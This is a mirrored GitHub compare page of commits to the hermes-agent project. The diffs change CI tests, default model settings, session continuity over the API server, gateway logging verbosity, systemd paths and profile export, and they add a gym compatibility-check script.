mirror of
https://github.com/NousResearch/hermes-agent.git
synced 2026-06-15 14:41:16 +08:00
Compare commits
37 Commits
hermes/her
...
nemo-gym-c
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
be43bee11a | ||
|
|
721e0b96cd | ||
|
|
d988343570 | ||
|
|
43dee2e1cf | ||
|
|
637a214820 | ||
|
|
f168a4f1bf | ||
|
|
6442255f83 | ||
|
|
44371a9bbb | ||
|
|
bd9e0b605f | ||
|
|
99e6f44204 | ||
|
|
1f1297f56c | ||
|
|
04e60cfacd | ||
|
|
ecd9bf2ca0 | ||
|
|
b209dc0f43 | ||
|
|
67e1170b01 | ||
|
|
bff34b1df9 | ||
|
|
ba48cfe84a | ||
|
|
de9bba8d7c | ||
|
|
3628ccc8c4 | ||
|
|
c59ab8b0da | ||
|
|
16d9f58445 | ||
|
|
1515e8c8f2 | ||
|
|
127a4e512b | ||
|
|
712aa44325 | ||
|
|
7e91009018 | ||
|
|
bf19623a53 | ||
|
|
3ff9e0101d | ||
|
|
b267516851 | ||
|
|
d435acc2c0 | ||
|
|
bacc86d031 | ||
|
|
5bd01b838c | ||
|
|
3400098481 | ||
|
|
e905768ffd | ||
|
|
e0abf2416d | ||
|
|
f6ada27d1c | ||
|
|
70744add15 | ||
|
|
85e96a4638 |
30
.github/workflows/tests.yml
vendored
30
.github/workflows/tests.yml
vendored
@@ -34,9 +34,37 @@ jobs:
|
||||
- name: Run tests
|
||||
run: |
|
||||
source .venv/bin/activate
|
||||
python -m pytest tests/ -q --ignore=tests/integration --tb=short -n auto
|
||||
python -m pytest tests/ -q --ignore=tests/integration --ignore=tests/e2e --tb=short -n auto
|
||||
env:
|
||||
# Ensure tests don't accidentally call real APIs
|
||||
OPENROUTER_API_KEY: ""
|
||||
OPENAI_API_KEY: ""
|
||||
NOUS_API_KEY: ""
|
||||
|
||||
e2e:
|
||||
runs-on: ubuntu-latest
|
||||
timeout-minutes: 10
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Install uv
|
||||
uses: astral-sh/setup-uv@v5
|
||||
|
||||
- name: Set up Python 3.11
|
||||
run: uv python install 3.11
|
||||
|
||||
- name: Install dependencies
|
||||
run: |
|
||||
uv venv .venv --python 3.11
|
||||
source .venv/bin/activate
|
||||
uv pip install -e ".[all,dev]"
|
||||
|
||||
- name: Run e2e tests
|
||||
run: |
|
||||
source .venv/bin/activate
|
||||
python -m pytest tests/e2e/ -v --tb=short
|
||||
env:
|
||||
OPENROUTER_API_KEY: ""
|
||||
OPENAI_API_KEY: ""
|
||||
NOUS_API_KEY: ""
|
||||
|
||||
@@ -426,7 +426,7 @@ class SessionManager:
|
||||
|
||||
config = load_config()
|
||||
model_cfg = config.get("model")
|
||||
default_model = "anthropic/claude-opus-4.6"
|
||||
default_model = ""
|
||||
config_provider = None
|
||||
if isinstance(model_cfg, dict):
|
||||
default_model = str(model_cfg.get("default") or default_model)
|
||||
|
||||
@@ -189,6 +189,13 @@ TOOL_USE_ENFORCEMENT_GUIDANCE = (
|
||||
# Add new patterns here when a model family needs explicit steering.
|
||||
TOOL_USE_ENFORCEMENT_MODELS = ("gpt", "codex")
|
||||
|
||||
# Model name substrings that should use the 'developer' role instead of
|
||||
# 'system' for the system prompt. OpenAI's newer models (GPT-5, Codex)
|
||||
# give stronger instruction-following weight to the 'developer' role.
|
||||
# The swap happens at the API boundary in _build_api_kwargs() so internal
|
||||
# message representation stays consistent ("system" everywhere).
|
||||
DEVELOPER_ROLE_MODELS = ("gpt-5", "codex")
|
||||
|
||||
PLATFORM_HINTS = {
|
||||
"whatsapp": (
|
||||
"You are on a text messaging communication platform, WhatsApp. "
|
||||
|
||||
@@ -230,7 +230,13 @@ def get_all_skills_dirs() -> List[Path]:
|
||||
|
||||
def extract_skill_conditions(frontmatter: Dict[str, Any]) -> Dict[str, List]:
|
||||
"""Extract conditional activation fields from parsed frontmatter."""
|
||||
hermes = (frontmatter.get("metadata") or {}).get("hermes") or {}
|
||||
metadata = frontmatter.get("metadata")
|
||||
# Handle cases where metadata is not a dict (e.g., a string from malformed YAML)
|
||||
if not isinstance(metadata, dict):
|
||||
metadata = {}
|
||||
hermes = metadata.get("hermes") or {}
|
||||
if not isinstance(hermes, dict):
|
||||
hermes = {}
|
||||
return {
|
||||
"fallback_for_toolsets": hermes.get("fallback_for_toolsets", []),
|
||||
"requires_toolsets": hermes.get("requires_toolsets", []),
|
||||
|
||||
20
cli.py
20
cli.py
@@ -144,8 +144,8 @@ def load_cli_config() -> Dict[str, Any]:
|
||||
# Default configuration
|
||||
defaults = {
|
||||
"model": {
|
||||
"default": "anthropic/claude-opus-4.6",
|
||||
"base_url": OPENROUTER_BASE_URL,
|
||||
"default": "",
|
||||
"base_url": "",
|
||||
"provider": "auto",
|
||||
},
|
||||
"terminal": {
|
||||
@@ -262,6 +262,14 @@ def load_cli_config() -> Dict[str, Any]:
|
||||
elif isinstance(file_config["model"], dict):
|
||||
# Old format: model is a dict with default/base_url
|
||||
defaults["model"].update(file_config["model"])
|
||||
# If the user config sets model.model but not model.default,
|
||||
# promote model.model to model.default so the user's explicit
|
||||
# choice isn't shadowed by the hardcoded default. Without this,
|
||||
# profile configs that only set "model:" (not "default:") silently
|
||||
# fall back to claude-opus because the merge preserves the
|
||||
# hardcoded default and HermesCLI.__init__ checks "default" first.
|
||||
if "model" in file_config["model"] and "default" not in file_config["model"]:
|
||||
defaults["model"]["default"] = file_config["model"]["model"]
|
||||
|
||||
# Legacy root-level provider/base_url fallback.
|
||||
# Some users (or old code) put provider: / base_url: at the
|
||||
@@ -1095,7 +1103,7 @@ class HermesCLI:
|
||||
# env vars would stomp each other.
|
||||
_model_config = CLI_CONFIG.get("model", {})
|
||||
_config_model = (_model_config.get("default") or _model_config.get("model") or "") if isinstance(_model_config, dict) else (_model_config or "")
|
||||
_DEFAULT_CONFIG_MODEL = "anthropic/claude-opus-4.6"
|
||||
_DEFAULT_CONFIG_MODEL = ""
|
||||
self.model = model or _config_model or _DEFAULT_CONFIG_MODEL
|
||||
# Auto-detect model from local server if still on default
|
||||
if self.model == _DEFAULT_CONFIG_MODEL:
|
||||
@@ -1979,10 +1987,12 @@ class HermesCLI:
|
||||
base_url, _source,
|
||||
)
|
||||
else:
|
||||
self.console.print("[bold red]Provider resolver returned an empty API key.[/]")
|
||||
print("\n⚠️ Provider resolver returned an empty API key. "
|
||||
"Set OPENROUTER_API_KEY or run: hermes setup")
|
||||
return False
|
||||
if not isinstance(base_url, str) or not base_url:
|
||||
self.console.print("[bold red]Provider resolver returned an empty base URL.[/]")
|
||||
print("\n⚠️ Provider resolver returned an empty base URL. "
|
||||
"Check your provider config or run: hermes setup")
|
||||
return False
|
||||
|
||||
credentials_changed = api_key != self.api_key or base_url != self.base_url
|
||||
|
||||
@@ -193,6 +193,10 @@ class HermesAgentLoop:
|
||||
|
||||
import time as _time
|
||||
|
||||
prompt_token_ids = None
|
||||
generation_token_ids = None
|
||||
generation_log_probs = None
|
||||
|
||||
for turn in range(self.max_turns):
|
||||
turn_start = _time.monotonic()
|
||||
|
||||
@@ -246,6 +250,12 @@ class HermesAgentLoop:
|
||||
)
|
||||
|
||||
assistant_msg = response.choices[0].message
|
||||
if hasattr(assistant_msg, "prompt_token_ids"):
|
||||
prompt_token_ids = assistant_msg.prompt_token_ids
|
||||
if hasattr(assistant_msg, "generation_token_ids"):
|
||||
generation_token_ids = assistant_msg.generation_token_ids
|
||||
if hasattr(assistant_msg, "generation_log_probs"):
|
||||
generation_log_probs = assistant_msg.generation_log_probs
|
||||
|
||||
# Extract reasoning content from the response (all provider formats)
|
||||
reasoning = _extract_reasoning_from_message(assistant_msg)
|
||||
@@ -308,7 +318,10 @@ class HermesAgentLoop:
|
||||
"content": assistant_msg.content or "",
|
||||
"tool_calls": [_tc_to_dict(tc) for tc in assistant_msg.tool_calls],
|
||||
}
|
||||
|
||||
if prompt_token_ids is not None:
|
||||
msg_dict["prompt_token_ids"] = prompt_token_ids
|
||||
msg_dict["generation_token_ids"] = generation_token_ids
|
||||
msg_dict["generation_log_probs"] = generation_log_probs
|
||||
# Preserve reasoning_content for multi-turn chat template handling
|
||||
# (e.g., Kimi-K2's template renders <think> blocks differently
|
||||
# for history vs. the latest turn based on this field)
|
||||
@@ -471,6 +484,10 @@ class HermesAgentLoop:
|
||||
}
|
||||
if reasoning:
|
||||
msg_dict["reasoning_content"] = reasoning
|
||||
if prompt_token_ids is not None:
|
||||
msg_dict["prompt_token_ids"] = prompt_token_ids
|
||||
msg_dict["generation_token_ids"] = generation_token_ids
|
||||
msg_dict["generation_log_probs"] = generation_log_probs
|
||||
messages.append(msg_dict)
|
||||
|
||||
turn_elapsed = _time.monotonic() - turn_start
|
||||
|
||||
144
environments/check_gym_compat.py
Normal file
144
environments/check_gym_compat.py
Normal file
@@ -0,0 +1,144 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Quick compatibility check: connect to a local OpenAI-compatible endpoint
|
||||
and run a single agent turn via HermesAgentLoop with all standard tools.
|
||||
|
||||
Usage:
|
||||
python environments/check_gym_compat.py # auto-detect model
|
||||
python environments/check_gym_compat.py --model my-model # explicit model
|
||||
python environments/check_gym_compat.py --base-url http://... --model ...
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import argparse
|
||||
import json
|
||||
import logging
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
# Ensure repo root is on sys.path when run as a standalone script
|
||||
_repo_root = str(Path(__file__).resolve().parent.parent)
|
||||
if _repo_root not in sys.path:
|
||||
sys.path.insert(0, _repo_root)
|
||||
|
||||
import requests
|
||||
from openai import AsyncOpenAI
|
||||
|
||||
from environments.agent_loop import HermesAgentLoop, AgentResult
|
||||
from model_tools import get_tool_definitions
|
||||
|
||||
logging.basicConfig(level=logging.INFO, format="%(levelname)s %(name)s: %(message)s")
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Thin server wrapper — gives HermesAgentLoop the chat_completion() it wants
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class OpenAIServer:
|
||||
"""Minimal async server wrapping an OpenAI-compatible endpoint."""
|
||||
|
||||
def __init__(self, base_url: str, model: str, api_key: str = "dummy"):
|
||||
self.model = model
|
||||
self.client = AsyncOpenAI(base_url=base_url, api_key=api_key)
|
||||
|
||||
async def chat_completion(self, **kwargs):
|
||||
kwargs.setdefault("model", self.model)
|
||||
return await self.client.chat.completions.create(**kwargs)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def detect_model(base_url: str) -> str:
|
||||
try:
|
||||
resp = requests.get(f"{base_url}/models", timeout=10)
|
||||
resp.raise_for_status()
|
||||
models = resp.json().get("data", [])
|
||||
if not models:
|
||||
print("WARNING: /v1/models returned no models")
|
||||
return "default"
|
||||
model_id = models[0]["id"]
|
||||
print(f"Auto-detected model: {model_id}")
|
||||
return model_id
|
||||
except Exception as e:
|
||||
print(f"Could not auto-detect model ({e}), falling back to 'default'")
|
||||
return "default"
|
||||
|
||||
|
||||
async def run_check(base_url: str, model: str, message: str) -> AgentResult:
|
||||
server = OpenAIServer(base_url=base_url, model=model)
|
||||
|
||||
# Get all default hermes tools
|
||||
tool_schemas = get_tool_definitions(quiet_mode=False)
|
||||
valid_names = {t["function"]["name"] for t in tool_schemas}
|
||||
|
||||
agent = HermesAgentLoop(
|
||||
server=server,
|
||||
tool_schemas=tool_schemas,
|
||||
valid_tool_names=valid_names,
|
||||
max_turns=5,
|
||||
)
|
||||
|
||||
messages = [
|
||||
{"role": "system", "content": "You are a helpful assistant with access to tools."},
|
||||
{"role": "user", "content": message},
|
||||
]
|
||||
|
||||
return await agent.run(messages)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Main
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Check gym endpoint compatibility")
|
||||
parser.add_argument("--base-url", default="http://127.0.0.1:11746/v1")
|
||||
parser.add_argument("--model", default=None)
|
||||
parser.add_argument("--message", default="Hello! What's the current directory you're in?")
|
||||
args = parser.parse_args()
|
||||
|
||||
model = args.model or detect_model(args.base_url)
|
||||
|
||||
print(f"\n{'='*60}")
|
||||
print(f"Endpoint: {args.base_url}")
|
||||
print(f"Model: {model}")
|
||||
print(f"Message: {args.message}")
|
||||
print(f"{'='*60}\n")
|
||||
|
||||
try:
|
||||
result = asyncio.run(run_check(args.base_url, model, args.message))
|
||||
|
||||
print(f"\n{'='*60}")
|
||||
print(f"Turns used: {result.turns_used}")
|
||||
print(f"Finished naturally: {result.finished_naturally}")
|
||||
print(f"Tool errors: {len(result.tool_errors)}")
|
||||
print(f"{'='*60}")
|
||||
|
||||
# Print the final assistant response
|
||||
for msg in reversed(result.messages):
|
||||
# if msg.get("role") == "assistant" and msg.get("content"):
|
||||
# print("\nRESPONSE:")
|
||||
# print(msg["content"])
|
||||
# break
|
||||
print(msg)
|
||||
|
||||
if result.tool_errors:
|
||||
print("\nTOOL ERRORS:")
|
||||
for err in result.tool_errors:
|
||||
print(f" turn {err.turn}: {err.tool_name} — {err.error}")
|
||||
|
||||
status = "✅ passed" if result.finished_naturally else "⚠️ hit max turns"
|
||||
print(f"\nGym compatibility check {status}")
|
||||
|
||||
except Exception as e:
|
||||
print(f"\n❌ Gym compatibility check failed: {e}")
|
||||
import traceback
|
||||
traceback.print_exc()
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -2,7 +2,7 @@
|
||||
OpenAI-compatible API server platform adapter.
|
||||
|
||||
Exposes an HTTP server with endpoints:
|
||||
- POST /v1/chat/completions — OpenAI Chat Completions format (stateless)
|
||||
- POST /v1/chat/completions — OpenAI Chat Completions format (stateless; opt-in session continuity via X-Hermes-Session-Id header)
|
||||
- POST /v1/responses — OpenAI Responses API format (stateful via previous_response_id)
|
||||
- GET /v1/responses/{response_id} — Retrieve a stored response
|
||||
- DELETE /v1/responses/{response_id} — Delete a stored response
|
||||
@@ -300,6 +300,7 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
self._runner: Optional["web.AppRunner"] = None
|
||||
self._site: Optional["web.TCPSite"] = None
|
||||
self._response_store = ResponseStore()
|
||||
self._session_db: Optional[Any] = None # Lazy-init SessionDB for session continuity
|
||||
|
||||
@staticmethod
|
||||
def _parse_cors_origins(value: Any) -> tuple[str, ...]:
|
||||
@@ -496,7 +497,23 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
status=400,
|
||||
)
|
||||
|
||||
session_id = str(uuid.uuid4())
|
||||
# Allow caller to continue an existing session by passing X-Hermes-Session-Id.
|
||||
# When provided, history is loaded from state.db instead of from the request body.
|
||||
provided_session_id = request.headers.get("X-Hermes-Session-Id", "").strip()
|
||||
if provided_session_id:
|
||||
session_id = provided_session_id
|
||||
try:
|
||||
if self._session_db is None:
|
||||
from hermes_state import SessionDB
|
||||
self._session_db = SessionDB()
|
||||
history = self._session_db.get_messages_as_conversation(session_id)
|
||||
except Exception as e:
|
||||
logger.warning("Failed to load session history for %s: %s", session_id, e)
|
||||
history = []
|
||||
else:
|
||||
session_id = str(uuid.uuid4())
|
||||
# history already set from request body above
|
||||
|
||||
completion_id = f"chatcmpl-{uuid.uuid4().hex[:29]}"
|
||||
model_name = body.get("model", "hermes-agent")
|
||||
created = int(time.time())
|
||||
@@ -540,7 +557,7 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
|
||||
return await self._write_sse_chat_completion(
|
||||
request, completion_id, model_name, created, _stream_q,
|
||||
agent_task, agent_ref,
|
||||
agent_task, agent_ref, session_id=session_id,
|
||||
)
|
||||
|
||||
# Non-streaming: run the agent (with optional Idempotency-Key)
|
||||
@@ -599,11 +616,11 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
},
|
||||
}
|
||||
|
||||
return web.json_response(response_data)
|
||||
return web.json_response(response_data, headers={"X-Hermes-Session-Id": session_id})
|
||||
|
||||
async def _write_sse_chat_completion(
|
||||
self, request: "web.Request", completion_id: str, model: str,
|
||||
created: int, stream_q, agent_task, agent_ref=None,
|
||||
created: int, stream_q, agent_task, agent_ref=None, session_id: str = None,
|
||||
) -> "web.StreamResponse":
|
||||
"""Write real streaming SSE from agent's stream_delta_callback queue.
|
||||
|
||||
@@ -620,6 +637,8 @@ class APIServerAdapter(BasePlatformAdapter):
|
||||
cors = self._cors_headers_for_origin(origin) if origin else None
|
||||
if cors:
|
||||
sse_headers.update(cors)
|
||||
if session_id:
|
||||
sse_headers["X-Hermes-Session-Id"] = session_id
|
||||
response = web.StreamResponse(status=200, headers=sse_headers)
|
||||
await response.prepare(request)
|
||||
|
||||
|
||||
@@ -1280,8 +1280,8 @@ class GatewayRunner:
|
||||
try:
|
||||
self.session_store._ensure_loaded()
|
||||
for key, entry in list(self.session_store._entries.items()):
|
||||
if entry.session_id in self.session_store._pre_flushed_sessions:
|
||||
continue # already flushed this session
|
||||
if entry.memory_flushed:
|
||||
continue # already flushed this session (persisted to disk)
|
||||
if not self.session_store._is_session_expired(entry):
|
||||
continue # session still active
|
||||
# Session has expired — flush memories in the background
|
||||
@@ -1292,7 +1292,15 @@ class GatewayRunner:
|
||||
try:
|
||||
await self._async_flush_memories(entry.session_id, key)
|
||||
self._shutdown_gateway_honcho(key)
|
||||
self.session_store._pre_flushed_sessions.add(entry.session_id)
|
||||
# Mark as flushed and persist to disk so the flag
|
||||
# survives gateway restarts.
|
||||
with self.session_store._lock:
|
||||
entry.memory_flushed = True
|
||||
self.session_store._save()
|
||||
logger.info(
|
||||
"Pre-reset memory flush completed for session %s",
|
||||
entry.session_id,
|
||||
)
|
||||
except Exception as e:
|
||||
logger.debug("Proactive memory flush failed for %s: %s", entry.session_id, e)
|
||||
except Exception as e:
|
||||
@@ -6186,7 +6194,7 @@ def _start_cron_ticker(stop_event: threading.Event, adapters=None, interval: int
|
||||
logger.info("Cron ticker stopped")
|
||||
|
||||
|
||||
async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool = False) -> bool:
|
||||
async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool = False, verbosity: Optional[int] = 0) -> bool:
|
||||
"""
|
||||
Start the gateway and run until interrupted.
|
||||
|
||||
@@ -6288,6 +6296,21 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
|
||||
logging.getLogger().addHandler(file_handler)
|
||||
logging.getLogger().setLevel(logging.INFO)
|
||||
|
||||
# Optional stderr handler — level driven by -v/-q flags on the CLI.
|
||||
# verbosity=None (-q/--quiet): no stderr output
|
||||
# verbosity=0 (default): WARNING and above
|
||||
# verbosity=1 (-v): INFO and above
|
||||
# verbosity=2+ (-vv/-vvv): DEBUG
|
||||
if verbosity is not None:
|
||||
_stderr_level = {0: logging.WARNING, 1: logging.INFO}.get(verbosity, logging.DEBUG)
|
||||
_stderr_handler = logging.StreamHandler()
|
||||
_stderr_handler.setLevel(_stderr_level)
|
||||
_stderr_handler.setFormatter(RedactingFormatter('%(levelname)s %(name)s: %(message)s'))
|
||||
logging.getLogger().addHandler(_stderr_handler)
|
||||
# Lower root logger level if needed so DEBUG records can reach the handler
|
||||
if _stderr_level < logging.getLogger().level:
|
||||
logging.getLogger().setLevel(_stderr_level)
|
||||
|
||||
# Separate errors-only log for easy debugging
|
||||
error_handler = RotatingFileHandler(
|
||||
log_dir / 'errors.log',
|
||||
|
||||
@@ -364,6 +364,12 @@ class SessionEntry:
|
||||
auto_reset_reason: Optional[str] = None # "idle" or "daily"
|
||||
reset_had_activity: bool = False # whether the expired session had any messages
|
||||
|
||||
# Set by the background expiry watcher after it successfully flushes
|
||||
# memories for this session. Persisted to sessions.json so the flag
|
||||
# survives gateway restarts (the old in-memory _pre_flushed_sessions
|
||||
# set was lost on restart, causing redundant re-flushes).
|
||||
memory_flushed: bool = False
|
||||
|
||||
def to_dict(self) -> Dict[str, Any]:
|
||||
result = {
|
||||
"session_key": self.session_key,
|
||||
@@ -381,6 +387,7 @@ class SessionEntry:
|
||||
"last_prompt_tokens": self.last_prompt_tokens,
|
||||
"estimated_cost_usd": self.estimated_cost_usd,
|
||||
"cost_status": self.cost_status,
|
||||
"memory_flushed": self.memory_flushed,
|
||||
}
|
||||
if self.origin:
|
||||
result["origin"] = self.origin.to_dict()
|
||||
@@ -416,6 +423,7 @@ class SessionEntry:
|
||||
last_prompt_tokens=data.get("last_prompt_tokens", 0),
|
||||
estimated_cost_usd=data.get("estimated_cost_usd", 0.0),
|
||||
cost_status=data.get("cost_status", "unknown"),
|
||||
memory_flushed=data.get("memory_flushed", False),
|
||||
)
|
||||
|
||||
|
||||
@@ -479,9 +487,6 @@ class SessionStore:
|
||||
self._loaded = False
|
||||
self._lock = threading.Lock()
|
||||
self._has_active_processes_fn = has_active_processes_fn
|
||||
# on_auto_reset is deprecated — memory flush now runs proactively
|
||||
# via the background session expiry watcher in GatewayRunner.
|
||||
self._pre_flushed_sessions: set = set() # session_ids already flushed by watcher
|
||||
|
||||
# Initialize SQLite session database
|
||||
self._db = None
|
||||
@@ -684,15 +689,12 @@ class SessionStore:
|
||||
self._save()
|
||||
return entry
|
||||
else:
|
||||
# Session is being auto-reset. The background expiry watcher
|
||||
# should have already flushed memories proactively; discard
|
||||
# the marker so it doesn't accumulate.
|
||||
# Session is being auto-reset.
|
||||
was_auto_reset = True
|
||||
auto_reset_reason = reset_reason
|
||||
# Track whether the expired session had any real conversation
|
||||
reset_had_activity = entry.total_tokens > 0
|
||||
db_end_session_id = entry.session_id
|
||||
self._pre_flushed_sessions.discard(entry.session_id)
|
||||
else:
|
||||
was_auto_reset = False
|
||||
auto_reset_reason = None
|
||||
|
||||
@@ -196,7 +196,7 @@ def ensure_hermes_home():
|
||||
# =============================================================================
|
||||
|
||||
DEFAULT_CONFIG = {
|
||||
"model": "anthropic/claude-opus-4.6",
|
||||
"model": "",
|
||||
"fallback_providers": [],
|
||||
"credential_pool_strategies": {},
|
||||
"toolsets": ["hermes-cli"],
|
||||
@@ -247,6 +247,13 @@ DEFAULT_CONFIG = {
|
||||
"command_timeout": 30, # Timeout for browser commands in seconds (screenshot, navigate, etc.)
|
||||
"record_sessions": False, # Auto-record browser sessions as WebM videos
|
||||
"allow_private_urls": False, # Allow navigating to private/internal IPs (localhost, 192.168.x.x, etc.)
|
||||
"camofox": {
|
||||
# When true, Hermes sends a stable profile-scoped userId to Camofox
|
||||
# so the server can map it to a persistent browser profile directory.
|
||||
# Requires Camofox server to be configured with CAMOFOX_PROFILE_DIR.
|
||||
# When false (default), each session gets a random userId (ephemeral).
|
||||
"managed_persistence": False,
|
||||
},
|
||||
},
|
||||
|
||||
# Filesystem checkpoints — automatic snapshots before destructive file ops.
|
||||
|
||||
@@ -463,6 +463,32 @@ def _build_user_local_paths(home: Path, path_entries: list[str]) -> list[str]:
|
||||
return [p for p in candidates if p not in path_entries and Path(p).exists()]
|
||||
|
||||
|
||||
def _hermes_home_for_target_user(target_home_dir: str) -> str:
|
||||
"""Remap the current HERMES_HOME to the equivalent under a target user's home.
|
||||
|
||||
When installing a system service via sudo, get_hermes_home() resolves to
|
||||
root's home. This translates it to the target user's equivalent path:
|
||||
/root/.hermes → /home/alice/.hermes
|
||||
/root/.hermes/profiles/coder → /home/alice/.hermes/profiles/coder
|
||||
/opt/custom-hermes → /opt/custom-hermes (kept as-is)
|
||||
"""
|
||||
current_hermes = get_hermes_home().resolve()
|
||||
current_default = (Path.home() / ".hermes").resolve()
|
||||
target_default = Path(target_home_dir) / ".hermes"
|
||||
|
||||
# Default ~/.hermes → remap to target user's default
|
||||
if current_hermes == current_default:
|
||||
return str(target_default)
|
||||
|
||||
# Profile or subdir of ~/.hermes → preserve the relative structure
|
||||
try:
|
||||
relative = current_hermes.relative_to(current_default)
|
||||
return str(target_default / relative)
|
||||
except ValueError:
|
||||
# Completely custom path (not under ~/.hermes) — keep as-is
|
||||
return str(current_hermes)
|
||||
|
||||
|
||||
def generate_systemd_unit(system: bool = False, run_as_user: str | None = None) -> str:
|
||||
python_path = get_python_path()
|
||||
working_dir = str(PROJECT_ROOT)
|
||||
@@ -478,12 +504,11 @@ def generate_systemd_unit(system: bool = False, run_as_user: str | None = None)
|
||||
if resolved_node_dir not in path_entries:
|
||||
path_entries.append(resolved_node_dir)
|
||||
|
||||
hermes_home = str(get_hermes_home().resolve())
|
||||
|
||||
common_bin_paths = ["/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"]
|
||||
|
||||
if system:
|
||||
username, group_name, home_dir = _system_service_identity(run_as_user)
|
||||
hermes_home = _hermes_home_for_target_user(home_dir)
|
||||
path_entries.extend(_build_user_local_paths(Path(home_dir), path_entries))
|
||||
path_entries.extend(common_bin_paths)
|
||||
sane_path = ":".join(path_entries)
|
||||
@@ -518,6 +543,7 @@ StandardError=journal
|
||||
WantedBy=multi-user.target
|
||||
"""
|
||||
|
||||
hermes_home = str(get_hermes_home().resolve())
|
||||
path_entries.extend(_build_user_local_paths(Path.home(), path_entries))
|
||||
path_entries.extend(common_bin_paths)
|
||||
sane_path = ":".join(path_entries)
|
||||
@@ -1066,11 +1092,12 @@ def launchd_status(deep: bool = False):
|
||||
# Gateway Runner
|
||||
# =============================================================================
|
||||
|
||||
def run_gateway(verbose: bool = False, replace: bool = False):
|
||||
def run_gateway(verbose: int = 0, quiet: bool = False, replace: bool = False):
|
||||
"""Run the gateway in foreground.
|
||||
|
||||
Args:
|
||||
verbose: Enable verbose logging output.
|
||||
verbose: Stderr log verbosity count added on top of default WARNING (0=WARNING, 1=INFO, 2+=DEBUG).
|
||||
quiet: Suppress all stderr log output.
|
||||
replace: If True, kill any existing gateway instance before starting.
|
||||
This prevents systemd restart loops when the old process
|
||||
hasn't fully exited yet.
|
||||
@@ -1089,7 +1116,8 @@ def run_gateway(verbose: bool = False, replace: bool = False):
|
||||
|
||||
# Exit with code 1 if gateway fails to connect any platform,
|
||||
# so systemd Restart=on-failure will retry on transient errors
|
||||
success = asyncio.run(start_gateway(replace=replace))
|
||||
verbosity = None if quiet else verbose
|
||||
success = asyncio.run(start_gateway(replace=replace, verbosity=verbosity))
|
||||
if not success:
|
||||
sys.exit(1)
|
||||
|
||||
@@ -1863,9 +1891,10 @@ def gateway_command(args):
|
||||
|
||||
# Default to run if no subcommand
|
||||
if subcmd is None or subcmd == "run":
|
||||
verbose = getattr(args, 'verbose', False)
|
||||
verbose = getattr(args, 'verbose', 0)
|
||||
quiet = getattr(args, 'quiet', False)
|
||||
replace = getattr(args, 'replace', False)
|
||||
run_gateway(verbose, replace=replace)
|
||||
run_gateway(verbose, quiet=quiet, replace=replace)
|
||||
return
|
||||
|
||||
if subcmd == "setup":
|
||||
@@ -1993,7 +2022,7 @@ def gateway_command(args):
|
||||
|
||||
# Start fresh
|
||||
print("Starting gateway...")
|
||||
run_gateway(verbose=False)
|
||||
run_gateway(verbose=0)
|
||||
|
||||
elif subcmd == "status":
|
||||
deep = getattr(args, 'deep', False)
|
||||
|
||||
@@ -3857,7 +3857,10 @@ For more help on a command:
|
||||
|
||||
# gateway run (default)
|
||||
gateway_run = gateway_subparsers.add_parser("run", help="Run gateway in foreground")
|
||||
gateway_run.add_argument("-v", "--verbose", action="store_true")
|
||||
gateway_run.add_argument("-v", "--verbose", action="count", default=0,
|
||||
help="Increase stderr log verbosity (-v=INFO, -vv=DEBUG)")
|
||||
gateway_run.add_argument("-q", "--quiet", action="store_true",
|
||||
help="Suppress all stderr log output")
|
||||
gateway_run.add_argument("--replace", action="store_true",
|
||||
help="Replace any existing gateway instance (useful for systemd)")
|
||||
|
||||
|
||||
@@ -74,6 +74,8 @@ _DEFAULT_EXPORT_EXCLUDE_ROOT = frozenset({
|
||||
"hermes_state.db",
|
||||
"response_store.db", "response_store.db-shm", "response_store.db-wal",
|
||||
"gateway.pid", "gateway_state.json", "processes.json",
|
||||
"auth.json", # API keys, OAuth tokens, credential pools
|
||||
".env", # API keys (dotenv)
|
||||
"auth.lock", "active_profile", ".update_check",
|
||||
"errors.log",
|
||||
".hermes_history",
|
||||
@@ -765,8 +767,17 @@ def export_profile(name: str, output_path: str) -> Path:
|
||||
result = shutil.make_archive(base, "gztar", tmpdir, "default")
|
||||
return Path(result)
|
||||
|
||||
result = shutil.make_archive(base, "gztar", str(profile_dir.parent), name)
|
||||
return Path(result)
|
||||
# Named profiles — stage a filtered copy to exclude credentials
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
staged = Path(tmpdir) / name
|
||||
_CREDENTIAL_FILES = {"auth.json", ".env"}
|
||||
shutil.copytree(
|
||||
profile_dir,
|
||||
staged,
|
||||
ignore=lambda d, contents: _CREDENTIAL_FILES & set(contents),
|
||||
)
|
||||
result = shutil.make_archive(base, "gztar", tmpdir, name)
|
||||
return Path(result)
|
||||
|
||||
|
||||
def _normalize_profile_archive_parts(member_name: str) -> List[str]:
|
||||
|
||||
@@ -71,7 +71,7 @@ def _get_model_config() -> Dict[str, Any]:
|
||||
default = (cfg.get("default") or "").strip()
|
||||
base_url = (cfg.get("base_url") or "").strip()
|
||||
is_local = "localhost" in base_url or "127.0.0.1" in base_url
|
||||
is_fallback = not default or default == "anthropic/claude-opus-4.6"
|
||||
is_fallback = not default
|
||||
if is_local and is_fallback and base_url:
|
||||
detected = _auto_detect_local_model(base_url)
|
||||
if detected:
|
||||
@@ -133,6 +133,8 @@ def _resolve_runtime_from_pool_entry(
|
||||
if cfg_provider == "anthropic":
|
||||
